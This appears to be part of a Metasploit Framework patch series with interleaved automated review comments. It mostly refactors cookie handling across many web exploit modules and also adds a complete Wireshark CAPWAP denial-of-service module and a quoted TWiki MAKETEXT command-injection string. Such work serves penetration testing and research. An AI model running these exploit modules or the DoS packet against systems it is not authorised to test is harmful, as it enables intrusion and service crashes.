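Review bot: In the first wikka_spam_exec.rb hunk, `if res and res.get_cookies` no longer detects a missing cookie. The `.empty?` checks used on get_cookies elsewhere in this patch indicate that it returns a String, and an empty String is truthy in Ruby, so the `fail_with` branch for "No cookie found" is reached only when `res` is nil. Write the guard as `if res and !res.get_cookies.empty?`. `cookie` also used to hold only the single `name=value` pair picked out by the removed `scan`, and now holds everything get_cookies returns, so the format comment above it should be updated if that is intended. The enclosing method starts outside the hunk.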
@@ -255,7 +255,7 @@ class Metasploit3 < Msf::Exploit::Remote end # Detect the phpBB cookie name - if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'] =~ /(.*)_(sid|data)=/) + if res.get_cookies =~ /(.*)_(sid|data)=/ vprint_status("The server may require a cookie name of '#{$1}_data'") end diff --git a/modules/exploits/unix/http/lifesize_room.rb b/modules/exploits/unix/http/lifesize_room.rb index e8fef8bcbc..96d9b28600 100644 --- a/modules/exploits/unix/http/lifesize_room.rb +++ b/modules/exploits/unix/http/lifesize_room.rb @@ -56,11 +56,11 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'GET', }, 10) - if not (res and res.headers['set-cookie']) + if res.nil? || res.get_cookies.empty? fail_with(Failure::NotFound, 'Could not obtain a Session ID') end - sessionid = 'PHPSESSID=' << res.headers['set-cookie'].split('PHPSESSID=')[1].split('; ')[0] + sessionid = 'PHPSESSID=' << res.get_cookies.split('PHPSESSID=')[1].split('; ')[0] headers = { 'Cookie' => sessionid, diff --git a/modules/exploits/unix/webapp/foswiki_maketext.rb b/modules/exploits/unix/webapp/foswiki_maketext.rb index a5b410086f..4701e7cb72 100644 --- a/modules/exploits/unix/webapp/foswiki_maketext.rb +++ b/modules/exploits/unix/webapp/foswiki_maketext.rb @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if not res or res.code != 302 or res.headers['Set-Cookie'] !~ /FOSWIKISID=([0-9a-f]*)/ + if not res or res.code != 302 or res.get_cookies !~ /FOSWIKISID=([0-9a-f]*)/ vprint_status "#{res.code}\n#{res.body}" return nil end @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote vprint_good("validation_key found: #{validation_key}") if session.empty? - if res.headers['Set-Cookie'] =~ /FOSWIKISID=([0-9a-f]*)/ + if res.get_cookies =~ /FOSWIKISID=([0-9a-f]*)/ session = $1 else vprint_error("Error using anonymous access") 
@@ -110,7 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote end end - if res.headers['Set-Cookie'] =~ /FOSWIKISTRIKEONE=([0-9a-f]*)/ + if res.get_cookies =~ /FOSWIKISTRIKEONE=([0-9a-f]*)/ strike_one = $1 else vprint_error("Error getting the FOSWIKISTRIKEONE value") diff --git a/modules/exploits/unix/webapp/hastymail_exec.rb b/modules/exploits/unix/webapp/hastymail_exec.rb index ae6cfbfe69..9fb9ac8969 100644 --- a/modules/exploits/unix/webapp/hastymail_exec.rb +++ b/modules/exploits/unix/webapp/hastymail_exec.rb @@ -103,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 303 - @session_id = res["Set-Cookie"] + @session_id = res.get_cookies print_good "#{peer} - Authentication successful" end end diff --git a/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb b/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb index d3d21d0547..930db07be9 100644 --- a/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'GET' }) - if res and res.code == 200 and res.headers['Set-Cookie'] =~ /(.+)session/ + if res and res.code == 200 and res.get_cookies =~ /(.+)session/ print_status("#{peer} - Cookie prefix #{$1} found") cookie_prefix = $1 end diff --git a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb index 9645358c82..fa6e2b56d8 100644 --- a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb +++ b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb 
@@ -177,7 +177,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Checking Access to Media Component...") res = get_upload_form - if res and (res.code == 200 or res.code == 302) and res.headers['Set-Cookie'] and res.body =~ /You are not authorised to view this resource/ + if res and (res.code == 200 or res.code == 302) and !res.get_cookies.empty? and res.body =~ /You are not authorised to view this resource/ print_status("#{peer} - Authentication required... Proceeding...") if @username.empty? or @password.empty? @@ -196,7 +196,7 @@ class Metasploit3 < Msf::Exploit::Remote if not res or res.code != 303 fail_with(Failure::NoAccess, "#{peer} - Unable to Authenticate") end - elsif res and (res.code == 200 or res.code == 302) and res.headers['Set-Cookie'] and res.body =~ /<form action="(.*)" id="uploadForm"/ + elsif res and (res.code == 200 or res.code == 302) and !res.get_cookies.empty? and res.body =~ /<form action="(.*)" id="uploadForm"/ print_status("#{peer} - Authentication isn't required.... Proceeding...") @cookies = res.get_cookies.sub(/;$/, "") else diff --git a/modules/exploits/unix/webapp/nagios_graph_explorer.rb b/modules/exploits/unix/webapp/nagios_graph_explorer.rb index 0295f0f7db..9497ece6fd 100644 --- a/modules/exploits/unix/webapp/nagios_graph_explorer.rb +++ b/modules/exploits/unix/webapp/nagios_graph_explorer.rb @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote return '' if !res nsp = res.body.scan(/<input type='hidden' name='nsp' value='(.+)'>/).flatten[0] || '' - cookie = (res.headers['Set-Cookie'] || '').scan(/nagiosxi=(\w+); /).flatten[0] || '' + cookie = res.get_cookies.scan(/nagiosxi=(\w+); /).flatten[0] || '' return nsp, cookie end diff --git a/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb b/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb index a795414f59..d563f00ad0 100644 --- a/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb 
+++ b/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if res && res.code == 200 and res.headers['Set-Cookie'] =~ /OpenEMR=([a-zA-Z0-9]+)/ + if res && res.code == 200 and res.get_cookies =~ /OpenEMR=([a-zA-Z0-9]+)/ session = $1 print_status("#{rhost}:#{rport} - Login successful") print_status("#{rhost}:#{rport} - Session cookie is [ #{session} ]") diff --git a/modules/exploits/unix/webapp/phpmyadmin_config.rb b/modules/exploits/unix/webapp/phpmyadmin_config.rb index 2ee3f4a4b5..591fcc8ba0 100644 --- a/modules/exploits/unix/webapp/phpmyadmin_config.rb +++ b/modules/exploits/unix/webapp/phpmyadmin_config.rb @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote return end token = $1 - cookie = response["Set-Cookie"] + cookie = response.get_cookies # There is probably a great deal of randomization that can be done with # this format. diff --git a/modules/exploits/unix/webapp/sphpblog_file_upload.rb b/modules/exploits/unix/webapp/sphpblog_file_upload.rb index 1a91c5763e..ad723c98d9 100644 --- a/modules/exploits/unix/webapp/sphpblog_file_upload.rb +++ b/modules/exploits/unix/webapp/sphpblog_file_upload.rb @@ -112,10 +112,10 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => "user=#{user}&pass=#{pass}", }, 25) - if (res) + if res print_status("Successfully logged in as #{user}:#{pass}") - if (res.headers['Set-Cookie'] =~ /my_id=(.*)/) + if res.get_cookies =~ /my_id=(.*)/ session = $1 print_status("Successfully retrieved cookie: #{session}") return session diff --git a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb index e9116a64bd..cacbeb0e67 100644 --- a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb 
@@ -95,12 +95,12 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => data }) - if not res or res.headers['Location'] =~ /action=Login/ or not res.headers['Set-Cookie'] + if res.nil? or res.headers['Location'] =~ /action=Login/ or res.get_cookies.empty? print_error("#{peer} - Login failed with \"#{username}:#{password}\"") return end - if res.headers['Set-Cookie'] =~ /PHPSESSID=([A-Za-z0-9]*); path/ + if res.get_cookies =~ /PHPSESSID=([A-Za-z0-9]*); path/ session_id = $1 else print_error("#{peer} - Login failed with \"#{username}:#{password}\" (No session ID)") diff --git a/modules/exploits/unix/webapp/trixbox_langchoice.rb b/modules/exploits/unix/webapp/trixbox_langchoice.rb index 133b26b8a0..096f669368 100644 --- a/modules/exploits/unix/webapp/trixbox_langchoice.rb +++ b/modules/exploits/unix/webapp/trixbox_langchoice.rb @@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote vprint_status "We received the expected HTTP code #{target_code}" # We will need the cookie PHPSESSID to continue - cookies = response.headers['Set-Cookie'] + cookies = response.get_cookies # Make sure cookies were set if defined? cookies and cookies =~ PHPSESSID_REGEX @@ -145,7 +145,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status "The server responded to POST with HTTP code #{delivery_response.code}" # We will need the cookie PHPSESSID to continue - cookies = delivery_response.headers['Set-Cookie'] + cookies = delivery_response.get_cookies # Make sure cookies were set if cookies.nil? diff --git a/modules/exploits/unix/webapp/twiki_maketext.rb b/modules/exploits/unix/webapp/twiki_maketext.rb index 5a931d0f21..47bcba11be 100644 --- a/modules/exploits/unix/webapp/twiki_maketext.rb +++ b/modules/exploits/unix/webapp/twiki_maketext.rb @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if not res or res.code != 302 or res.headers['Set-Cookie'] !~ /TWIKISID=([0-9a-f]*)/ + if not res or res.code != 302 or res.get_cookies !~ /TWIKISID=([0-9a-f]*)/ return nil end 
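Review bot: In the second trixbox_langchoice.rb hunk, `cookies = delivery_response.get_cookies` is followed by the unchanged guard `if cookies.nil?`, which looks like it can no longer be true. Other hunks in this patch test the same return value with `.empty?`, which suggests get_cookies yields a String even when the response set no cookie. The guard should become `if cookies.empty?` so that the "cookies were set" check keeps its meaning. Both methods touched in this file extend beyond their hunks.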
@@ -106,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote vprint_good("crypttoken found: #{crypttoken}") if session.empty? - if res.headers['Set-Cookie'] =~ /TWIKISID=([0-9a-f]*)/ + if res.get_cookies =~ /TWIKISID=([0-9a-f]*)/ session = $1 else vprint_error("Error using anonymous access") @@ -225,4 +225,4 @@ end %MAKETEXT{"test [_1] secondtest\\'}; `touch /tmp/msf.txt`; { #" args="msf"}% -=end \ No newline at end of file +=end diff --git a/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb b/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb index 4d27bc797b..9194c0958b 100644 --- a/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb +++ b/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb @@ -157,7 +157,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if res and res.code == 200 and res.body and res.body.to_s =~ /window\.location.*admincp/ and res.headers['Set-Cookie'] + if res and res.code == 200 and res.body and res.body.to_s =~ /window\.location.*admincp/ and !res.get_cookies.empty? session = res.get_cookies else return nil diff --git a/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb b/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb index 9de059083a..b118f8867f 100644 --- a/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb +++ b/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb @@ -75,9 +75,9 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => data }, 25) - if res and res.code == 302 and res.headers['Set-Cookie'] =~ /sid/ + if res and res.code == 302 and res.get_cookies =~ /sid/ vprint_good "#{peer} - Authentication successful" - session = res.headers['Set-Cookie'].split("sid=")[1].split(";")[0] + session = res.get_cookies.split("sid=")[1].split(";")[0] else vprint_error "#{peer} - Service found, but authentication failed" return Exploit::CheckCode::Detected 
@@ -118,8 +118,8 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => data }, 25) - if res and res.code == 302 and res.headers['Set-Cookie'] =~ /sid/ - session = res.headers['Set-Cookie'].scan(/sid\=(\w+)\;*/).flatten[0] || '' + if res and res.code == 302 and res.get_cookies =~ /sid/ + session = res.get_cookies.scan(/sid\=(\w+)\;*/).flatten[0] || '' if session and not session.empty? print_good "#{peer} - Authentication successfully" else diff --git a/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb b/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb index d52ecda3a8..917730eeac 100644 --- a/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb +++ b/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb @@ -215,11 +215,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::UnexpectedReply, "Unexpected reply - #{res.code}") end - admin_cookie = '' - (res.headers['Set-Cookie'] || '').split(',').each do |cookie| - admin_cookie << cookie.split(';')[0] - admin_cookie << ';' - end + admin_cookie = res.get_cookies if admin_cookie.empty? fail_with(Failure::UnexpectedReply, 'The resulting cookie was empty') diff --git a/modules/exploits/unix/webapp/zpanel_username_exec.rb b/modules/exploits/unix/webapp/zpanel_username_exec.rb index e4508a5448..6191617631 100644 --- a/modules/exploits/unix/webapp/zpanel_username_exec.rb +++ b/modules/exploits/unix/webapp/zpanel_username_exec.rb @@ -88,7 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoAccess, "#{peer} - Login failed") end - res.headers['Set-Cookie'].to_s.scan(/(zUserSaltCookie=[a-z0-9]+)/).flatten[0] || '' + res.get_cookies.scan(/(zUserSaltCookie=[a-z0-9]+)/).flatten[0] || '' end 
@@ -103,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Connection timed out while collecting CSFR token") if not res token = res.body.scan(/<input type="hidden" name="csfr_token" value="(.+)">/).flatten[0] || '' - sid = res.headers['Set-Cookie'].to_s.scan(/(PHPSESSID=[a-z0-9]+)/).flatten[0] || '' + sid = res.get_cookies.scan(/(PHPSESSID=[a-z0-9]+)/).flatten[0] || '' fail_with(Failure::Unknown, "#{peer} - No CSFR token collected") if token.empty? return token, sid diff --git a/modules/exploits/windows/http/osb_uname_jlist.rb b/modules/exploits/windows/http/osb_uname_jlist.rb index 1590d1ba62..4b4422ebd1 100644 --- a/modules/exploits/windows/http/osb_uname_jlist.rb +++ b/modules/exploits/windows/http/osb_uname_jlist.rb @@ -74,8 +74,8 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'POST', }, 5) - if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/PHPSESSID=(.*);(.*)/i)) - sessionid = res.headers['Set-Cookie'].split(';')[0] + if res.get_cookies.match(/PHPSESSID=(.*);(.*)/i) + sessionid = res.get_cookies data = '?type=Job&jlist=0%26' + Rex::Text::uri_encode(cmd) diff --git a/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb b/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb index d583cd0285..53660c9e7e 100644 --- a/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb +++ b/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb @@ -187,8 +187,8 @@ class Metasploit3 < Msf::Exploit::Remote # Pick up the cookie, example: # JSESSIONID=D90AC5C0BB43B5AC1396736214A1B5EB - if res and res.headers['Set-Cookie'] =~ /JSESSIONID=(\w+);/ - cookie = "JSESSIONID=#{$1}" + if res and res.get_cookies =~ /JSESSIONID=(\w+);/ + cookie = res.get_cookies else print_error("Unable to get a session ID") return From df97c66ff5b8013026b557071529061bbde46349 Mon Sep 17 00:00:00 2001 
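Review bot: In osb_uname_jlist.rb, `res.get_cookies.match(...)` is called without checking `res`, so a request that gets no reply (the call above passes `5`, presumably a timeout) raises NoMethodError on nil instead of failing cleanly; the removed line had the same gap. Guard it with `if res and res.get_cookies.match(/PHPSESSID=(.*);(.*)/i)`. Note also that `sessionid` used to be the first `name=value` pair only (`split(';')[0]`) and is now the whole cookie string, which deserves a one-line comment if it is intended. The rest of the method is outside the hunk.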
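Review bot: In solarwinds_storage_manager_sql.rb, `cookie` now holds every cookie the server set, while the comment above it still describes a single `JSESSIONID=...` value and the capture group in `/JSESSIONID=(\w+);/` is no longer read. Update the comment to say the full cookie string is kept and drop the group: `if res and res.get_cookies =~ /JSESSIONID=\w+;/`. If later requests are meant to carry only the session cookie, the removed `"JSESSIONID=#{$1}"` form was the more precise one.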
From: Christian Mehlmauer <FireFart@gmail.com> Date: Sat, 24 May 2014 00:37:52 +0200 Subject: [PATCH 370/853] Fixed check --- modules/exploits/multi/http/wikka_spam_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/wikka_spam_exec.rb b/modules/exploits/multi/http/wikka_spam_exec.rb index 160a553278..e6068cdaba 100644 --- a/modules/exploits/multi/http/wikka_spam_exec.rb +++ b/modules/exploits/multi/http/wikka_spam_exec.rb @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote # Get the cookie in this format: # 96522b217a86eca82f6d72ef88c4c7f4=pr5sfcofh5848vnc2sm912ean2; path=/wikka - if res and res.get_cookies + if res and !res.get_cookies.empty? cookie = res.get_cookies else fail_with(Failure::Unknown, "#{peer} - No cookie found, will not continue") From 71e2d19040df63bf51b1f123532cc6bcc4f00b8b Mon Sep 17 00:00:00 2001 From: JoseMi <jholgui@gmail.com> Date: Sat, 24 May 2014 18:53:10 +0100 Subject: [PATCH 371/853] Adapted to auxiliary modules structure --- modules/auxiliary/dos/wireshark/capwap.rb | 54 +++++++++++++++++++++++ 1 file changed, 54 insertions(+) create mode 100644 modules/auxiliary/dos/wireshark/capwap.rb diff --git a/modules/auxiliary/dos/wireshark/capwap.rb b/modules/auxiliary/dos/wireshark/capwap.rb new file mode 100644 index 0000000000..12feb83d96 --- /dev/null +++ b/modules/auxiliary/dos/wireshark/capwap.rb 
@@ -0,0 +1,54 @@ +# +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::Udp + include Msf::Auxiliary::Dos + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Wireshark CAPWAP dissector DoS', + 'Description' => %q{ + This module inject malicious packet udp to crash wireshark. The crash is when we send + a incomplete packet and trigger capwap dissector. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'j0sm1', # Exploit and msf module + 'Laurent Butti' # Discovery vulnerability -> "Reported: 2013-05-28 23:38 UTC by Laurent Butti" + ], + 'References' => + [ + [ 'CVE', '2013-4074'], + ], + 'DisclosureDate' => 'Apr 28 2014')) + + + # Protocol capwap needs port 5247 to trigger the dissector in wireshark + register_options([ Opt::RPORT(5247) ], self.class) + + end + + def run + + connect_udp + + # We send a packet incomplete to crash dissector + print_status("#{rhost}:#{rport} - Trying to crash wireshark capwap dissector ...") + # With 0x90 in this location we set to 1 the flags F and M. The others flags are sets to 0, then + # the dissector crash + # You can see more information here: https://www.rfc-editor.org/rfc/rfc5415.txt + # F = 1 ; L = 0 ; W = 0 ; M = 1 ; K = 0 ; Flags = 000 + buf = Rex::Text.rand_text(3) + "\x90" + Rex::Text.rand_text(15) + udp_sock.put(buf) + + disconnect_udp + + end +end From 9f166b87f6479b5639862cb8ea99fcd8c332e87d Mon Sep 17 00:00:00 2001 From: JoseMi <jholgui@gmail.com> Date: Sat, 24 May 2014 18:58:36 +0100 Subject: [PATCH 372/853] Changed the description --- modules/auxiliary/dos/wireshark/capwap.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/dos/wireshark/capwap.rb b/modules/auxiliary/dos/wireshark/capwap.rb index 12feb83d96..6555ab5dcf 100644 --- a/modules/auxiliary/dos/wireshark/capwap.rb 
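Review bot: `disconnect_udp` at the end of `run` is skipped whenever `udp_sock.put(buf)` raises, which leaves the socket open; keep `connect_udp` first and wrap the rest as `begin ... ensure disconnect_udp end` so the cleanup is unconditional. Separately, `'DisclosureDate' => 'Apr 28 2014'` sits next to a credit comment that says the issue was reported on 2013-05-28 and a 2013 CVE id, so the date looks like the module's writing date rather than the disclosure date and should be checked against the advisory. The `Description` text would also read better as one plain sentence stating that an incomplete CAPWAP packet crashes the dissector.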
+++ b/modules/auxiliary/dos/wireshark/capwap.rb @@ -20,7 +20,7 @@ class Metasploit3 < Msf::Auxiliary 'License' => MSF_LICENSE, 'Author' => [ - 'j0sm1', # Exploit and msf module + 'j0sm1', # Auxiliary msf module 'Laurent Butti' # Discovery vulnerability -> "Reported: 2013-05-28 23:38 UTC by Laurent Butti" ], 'References' => From 4fc6e402dce1b1f24e1c9bc1e620468b6ef70c18 Mon Sep 17 00:00:00 2001 From: Lutz Wolf <lutz.wolf@damogran.de> Date: Sat, 24 May 2014 23:44:50 +0200 Subject: [PATCH 373/853] Allow port 0 --- lib/rex/socket.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/lib/rex/socket.rb b/lib/rex/socket.rb index ba510c5a80..db8206ce75 100644 --- a/lib/rex/socket.rb +++ b/lib/rex/socket.rb @@ -538,11 +538,11 @@ module Socket end if ports.empty? and not remove.empty? then - ports = 1.upto 65535 + ports = 0.upto 65535 end # Sort, and remove dups and invalid ports - ports.sort.uniq.delete_if { |p| p < 1 or p > 65535 or remove.include? p } + ports.sort.uniq.delete_if { |p| p < 0 or p > 65535 or remove.include? p } end # @@ -555,7 +555,7 @@ module Socket lastp = nil parr.uniq.sort{|a,b| a<=>b}.map{|a| a.to_i}.each do |n| - next if (n < 1 or n > 65535) + next if (n < 0 or n > 65535) if not lastp range = [n] lastp = n From fc5436417b8f431c8635b6a785b024859eedd223 Mon Sep 17 00:00:00 2001 From: Lutz Wolf <lutz.wolf@damogran.de> Date: Sat, 24 May 2014 23:45:21 +0200 Subject: [PATCH 374/853] Simplification --- lib/rex/socket.rb | 14 +++++--------- 1 file changed, 5 insertions(+), 9 deletions(-) diff --git a/lib/rex/socket.rb b/lib/rex/socket.rb index db8206ce75..e4aeb660ca 100644 --- a/lib/rex/socket.rb +++ b/lib/rex/socket.rb 
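Review bot: With `ports = 0.upto 65535` in lib/rex/socket.rb, a specification made only of exclusions now expands to a list that begins with port 0, so every caller that iterates the result receives a port it never saw before. If the intent is only to let a user name port 0 explicitly, keep the implicit range at `1.upto 65535` and relax just the filter to `p < 0`. Either way the method comment should say whether 0 belongs to the default range. The method starts outside the hunk, and the hunk at line 555 makes the matching bound change.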
@@ -514,13 +514,13 @@ module Socket # Build ports array from port specification pspec.split(/,/).each do |item| + target = ports + item.strip! - if item.starts_with? '!' then - negate = true + if item.start_with? '!' item.delete! '!' - else - negate = false + target = remove end start, stop = item.split(/-/).map { |p| p.to_i } @@ -530,11 +530,7 @@ module Socket start, stop = stop, start if stop < start - if negate then - start.upto(stop) { |p| remove << p } - else - start.upto(stop) { |p| ports << p } - end + start.upto(stop) { |p| target << p } end if ports.empty? and not remove.empty? then From 2b75a53c9382f33d39555cdde454da8fbed749ae Mon Sep 17 00:00:00 2001 From: Lutz Wolf <lutz.wolf@damogran.de> Date: Sat, 24 May 2014 23:46:26 +0200 Subject: [PATCH 375/853] Add basic rspec for portspec_to_portlist --- spec/lib/rex/socket_spec.rb | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) diff --git a/spec/lib/rex/socket_spec.rb b/spec/lib/rex/socket_spec.rb index 41c1abde79..3bc99de1bc 100644 --- a/spec/lib/rex/socket_spec.rb +++ b/spec/lib/rex/socket_spec.rb @@ -163,4 +163,35 @@ describe Rex::Socket do end end + + describe '.portspec_to_portlist' do + + portspec = '-1,0-10,!2-5,!7,65530-,65536' + context "'#{portspec}'" do + + subject { described_class.portspec_to_portlist portspec } + + it { should be_a(Array) } + + not_included = [] + not_included << -1 + not_included << 65536 + not_included.concat (2..5).to_a + not_included << 7 + not_included.each do |item| + it { should_not include item } + end + + included = [] + included << -1 + included.concat (0..10).to_a + included.concat (65530..65535).to_a + included << 65536 + included = included - not_included + included.each do |item| + it { should include item } + end + end + end + end From 76b9273f10e79568684a10ee740a1ba231dd6f9e Mon Sep 17 00:00:00 2001 
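Review bot: The new spec in spec/lib/rex/socket_spec.rb exercises one mixed specification and never reaches the branch the preceding patches changed, `if ports.empty? and not remove.empty?`, so the default range that now starts at 0 is untested. A second context with an exclusions-only spec (constructed example: `'!1-65534'`) would pin that behaviour down. In the `included` setup, `included << -1` and `included << 65536` are cancelled straight away by `included - not_included` and can be dropped.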
From: Tom Sellers <tom@fadedcode.net> Date: Sun, 25 May 2014 08:07:38 -0500 Subject: [PATCH 376/853] Improve reliability of have_powershell I have a case where on a Windows 2008 R2 host with PowerShell 2.0 the 'have_powershell' method times out. When I interactively run the command I find that the output stops after the PowerShell command and the token from 'cmd_exec' is NOT displayed. When I hit return the shell then processes the '&echo <randomstring>' and generates the token that 'cmd_exec' was looking for. I tried various versions of the PowerShell command string such as 'Get-Host;Exit(0)', '$PSVErsionTable.PSVersion', and '-Command Get-Host' but was unable to change the behavior. I found that adding 'echo. | ' simulated pressing enter and did not disrupt the results on this host or on another host where the 'have_powershell' method functioned as expected. There may be a better solution, but this was the only one that I could find. --- lib/msf/core/post/windows/powershell.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/post/windows/powershell.rb b/lib/msf/core/post/windows/powershell.rb index 33b6fca9f8..a438171662 100644 --- a/lib/msf/core/post/windows/powershell.rb +++ b/lib/msf/core/post/windows/powershell.rb @@ -19,7 +19,7 @@ module Powershell # Returns true if powershell is installed # def have_powershell? - cmd_out = cmd_exec("powershell get-host") + cmd_out = cmd_exec("echo. | powershell get-host") return true if cmd_out =~ /Name.*Version.*InstanceID/ return false end From 42a17cc08536239fffd54dcfde2532ebe04ae811 Mon Sep 17 00:00:00 2001 
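Review bot: The `echo. |` prefix in `have_powershell?` has no explanation in the code; the reason for it exists only in the commit message. A comment above the call would stop it from being removed later as noise, for example `# "echo. |" sends a newline to stdin; on some hosts powershell otherwise waits for Enter and cmd_exec times out`. The commit message also says no other fix was found, which is worth recording in the same comment as a known limitation.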
From: Tom Sellers <tom@fadedcode.net> Date: Sun, 25 May 2014 08:59:42 -0500 Subject: [PATCH 377/853] Update powershell.rb To be clear, the shell that was tested with was 'windows/shell_reverse_tcp' delivered via 'exploit/windows/smb/psexec' Additional changes required to fix regex to support the multiline output. Also, InstanceId uses a lower case 'D' on the platforms I tested - PowerShell 2.0 on Windows 2003, Windows 7, Windows 2008 R2 as well as PowerShell 4.0 on Windows 2012 R2. This method doesn't appear to be used anywhere in the Metasploit codebase currently. --- lib/msf/core/post/windows/powershell.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/post/windows/powershell.rb b/lib/msf/core/post/windows/powershell.rb index a438171662..d063846d88 100644 --- a/lib/msf/core/post/windows/powershell.rb +++ b/lib/msf/core/post/windows/powershell.rb @@ -20,7 +20,7 @@ module Powershell # def have_powershell? cmd_out = cmd_exec("echo. | powershell get-host") - return true if cmd_out =~ /Name.*Version.*InstanceID/ + return true if cmd_out =~ /Name.*Version.*InstanceId/m return false end From da0a9f66ea93307cf2985dab3f75cf5611932cc8 Mon Sep 17 00:00:00 2001 
From: Christian Mehlmauer <FireFart@gmail.com> Date: Sun, 25 May 2014 19:29:39 +0200 Subject: [PATCH 378/853] Resolved all msftidy vars_get warnings --- lib/rex/proto/http/client_request.rb | 10 +++++-- .../scanner/sap/sap_soap_bapi_user_create1.rb | 16 +++++++---- .../scanner/sap/sap_soap_rfc_brute_login.rb | 15 ++++++---- ...fc_dbmcli_sxpg_call_system_command_exec.rb | 10 +++++-- .../sap_soap_rfc_dbmcli_sxpg_command_exec.rb | 10 +++++-- .../scanner/sap/sap_soap_rfc_ping.rb | 17 ++++++----- .../scanner/sap/sap_soap_rfc_read_table.rb | 17 +++++------ .../sap_soap_rfc_susr_rfc_user_interface.rb | 17 ++++++----- .../sap/sap_soap_rfc_sxpg_call_system_exec.rb | 14 ++++++---- .../sap/sap_soap_rfc_sxpg_command_exec.rb | 8 ++++-- .../scanner/sap/sap_soap_rfc_system_info.rb | 8 ++++-- .../sap/sap_soap_th_saprel_disclosure.rb | 10 +++++-- .../linux/http/openfiler_networkcard_exec.rb | 8 ++++-- .../linux/http/sophos_wpa_iface_exec.rb | 26 ++++++++++++----- .../linux/http/zen_load_balancer_exec.rb | 14 ++++++---- .../multi/http/hyperic_hq_script_console.rb | 12 ++++++-- .../multi/http/openfire_auth_bypass.rb | 28 +++++++++++-------- .../http/adobe_robohelper_authbypass.rb | 18 ++++++------ .../http/desktopcentral_file_upload.rb | 14 +++++++--- .../windows/http/hp_nnm_ovalarm_lang.rb | 9 ++++-- .../exploits/windows/http/sybase_easerver.rb | 11 +++++--- .../windows/http/zenworks_uploadservlet.rb | 21 +++++++------- .../lib/rex/proto/http/client_request_spec.rb | 6 ++++ 23 files changed, 206 insertions(+), 113 deletions(-) diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 2758d8fa77..4336909510 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb 
